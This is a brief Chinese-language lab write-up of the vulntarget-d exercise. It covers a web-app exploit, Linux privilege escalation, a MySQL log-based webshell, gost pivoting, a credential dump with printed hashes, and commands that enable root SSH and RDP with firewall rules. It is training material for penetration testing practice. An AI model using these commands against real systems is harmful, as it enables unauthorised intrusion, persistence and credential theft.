vulntarget-d WriteUp

外网打点

192.168.255.134

nmap先扫一下

尝试访问80与81端口，结果只有81端口可以访问，是骑士cms 74cms v6.0.20

查看版本，找一下公开漏洞。这cms好熟悉 之前肯定打过

https://www.cnblogs.com/twlr/p/14142870.html

直接getshell

信息搜集

64位Ubuntu www用户，双网卡 192.168.68.0/24 192.168.255.0/24,发现主机255.254

先上msf，开socks代理，然后尝试提权

提权

linux_exploit_suggester

CVE-2021-4034

然后拿root权限改下密码

服务器没装openssh server，由于通外网直接给他装一个

sed -i '/PermitRootLogin /c PermitRootLogin yes' /etc/ssh/sshd_config

激活root远程登陆并且上线msf

内网信息搜集

上传fscan搜集一波

搜集完发现Windows主机68.129，80端口hello world，dirsearch扫一下发现phpmyadmin

http://192.168.68.129/phpmyadmin/

内网主机1

http://192.168.68.129/phpmyadmin/

弱口令root/root上去，尝试getshell。

secure_file_priv为NULL，无法直接写文件getshell，尝试日志getshell

日志getshell

set global general_log = “ON”;

还差一个绝对路径，正好泄露了phpinfo

修改日志文件

set global general_log_file = “C:/phpstudy/PHPTutorial/WWW/shell.php”;

上蚁剑,msf自带socks代理麻了，还是gost吧

kali：

ubuntu：

还是先上线msf，gost多层转发

上线msf

思路如下：内网主机1连接外网主机5001端口，外网主机监听5001 转发到kali5001，kali msf监听5001

外网主机：./gost-linux-amd64 -L=:5001/192.168.255.132:5001

有火绒，生成shellcode先免杀

提权

msf getsystem直接得到system权限,当前不在域环境，不考虑域渗透。

凭证获取

load kiwi

creds_all

crow WIN-D4S86JO2R26 209c6174da490caeb422f3fa5a7ae634 7c87541fd3f3ef5016e12d411900c87a6046a8e8

解密得到密码admin

开启3389

reg add "HKLM\System\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
最后一句话解决mstsc报错问题

开完3389系统崩了 懒得再弄一次了 草。